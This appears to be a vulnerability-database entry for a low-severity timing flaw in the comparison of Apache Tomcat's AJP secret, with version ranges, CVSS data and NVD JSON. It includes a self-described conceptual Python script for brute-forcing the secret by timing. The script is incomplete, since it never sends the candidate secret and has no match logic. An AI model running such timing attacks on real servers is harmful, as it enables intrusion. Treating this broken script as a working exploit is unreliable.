Security Vulnerability Report
CVE-2026-43514 CVSS 3.7 LOW

Published: 2026-05-12 16:16:18
Last Modified: 2026-05-14 18:46:41

Description

Observable Timing Discrepancy vulnerability when comparing AJP secret in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109. Older unsupported versions may also be affected. Users are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* - VULNERABLE - Apache Tomcat 11.0.0-M1 through 11.0.21
cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* - VULNERABLE - Apache Tomcat 10.1.0-M1 through 10.1.54
cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* - VULNERABLE - Apache Tomcat 9.0.0.M1 through 9.0.117
cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* - VULNERABLE - Apache Tomcat 8.5.0 through 8.5.100
cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* - VULNERABLE - Apache Tomcat 7.0.0 through 7.0.109

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import time

# Conceptual PoC for Timing Attack on AJP Secret
# This script demonstrates measuring response times for different secrets.
# Note: AJP is a binary protocol. This is a simplified logic demonstration.


def send_ajp_probe(host, port, secret_candidate):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    start_time = time.time()
    try:
        s.connect((host, port))
        # Construct a minimal AJP magic packet and a login attempt with the secret
        # Real AJP packet structure is more complex (0x1234, 0x00C, etc.)
        # Here we simulate sending data that triggers the secret check
        magic_bytes = b'\x12\x34\x00\x0C'
        # In a real exploit, you would encode the secret_candidate into the AJP packet
        s.sendall(magic_bytes)
        # Wait for response
        data = s.recv(1024)
    except Exception as e:
        pass
    end_time = time.time()
    s.close()
    return end_time - start_time


def brute_force_timing(host, port, charset):
    current_secret = ""
    # Simplified loop: In reality, you would iterate to find the next char
    # that causes a statistically significant delay.
    print(f"[*] Starting timing analysis against {host}:{port}")
    for char in charset:
        test_secret = current_secret + char
        durations = []
        # Send multiple requests to average out network noise
        for _ in range(10):
            duration = send_ajp_probe(host, port, test_secret)
            durations.append(duration)
        avg_duration = sum(durations) / len(durations)
        print(f"Testing '{test_secret}': Avg Time {avg_duration:.6f}s")
        # Logic to determine if the delay indicates a match would go here


if __name__ == "__main__":
    TARGET_HOST = "127.0.0.1"
    TARGET_PORT = 8009
    CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    brute_force_timing(TARGET_HOST, TARGET_PORT, CHARSET)

References

https://lists.apache.org/thread/2k654v5cq123npfsd1b2kk1y30owqb1m (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/05/12/10 (Mailing List, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-43514",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T16:16:18.370",
    "lastModified": "2026-05-14T18:46:41.457",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Observable Timing Discrepancy vulnerability when comparing AJP secret in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109.\nOlder unsupported versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 3.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-208"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndIncluding": "7.0.109", "matchCriteriaId": "5BE0EC99-5BCD-4F7F-8124-4A1734B7BF6B"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.5.0", "versionEndIncluding": "8.5.100", "matchCriteriaId": "FF43D0D7-FBF3-4D7A-84C4-47B65A75A524"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.0.118", "matchCriteriaId": "1E5A897C-91F4-449E-984C-7D693B137EED"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.0", "versionEndExcluding": "10.1.55", "matchCriteriaId": "5F289287-8587-4BB3-B4AB-3B5CF4A7D27A"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.22", "matchCriteriaId": "03FB799D-A66F-4792-A0CF-16D67BB53F08"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://lists.apache.org/thread/2k654v5cq123npfsd1b2kk1y30owqb1m", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]},
      {"url": "http://www.openwall.com/lists/oss-security/2026/05/12/10", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}
    ]
  }
}